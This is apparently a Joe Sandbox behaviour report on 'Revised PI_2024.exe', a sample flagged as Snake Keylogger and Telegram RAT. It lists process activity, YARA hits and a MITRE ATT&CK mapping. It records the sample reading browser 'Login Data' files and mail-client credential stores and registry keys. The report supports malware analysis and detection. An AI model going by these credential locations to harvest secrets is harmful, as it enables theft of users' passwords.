Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Users\user\Desktop\Revised PI_2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_00405BC6 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405BC6

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Revised PI_2024.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Revised PI_2024.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Time Based Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Time Based Evasion	Cached Domain Credentials	115 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Revised PI_2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Revised PI_2024.exe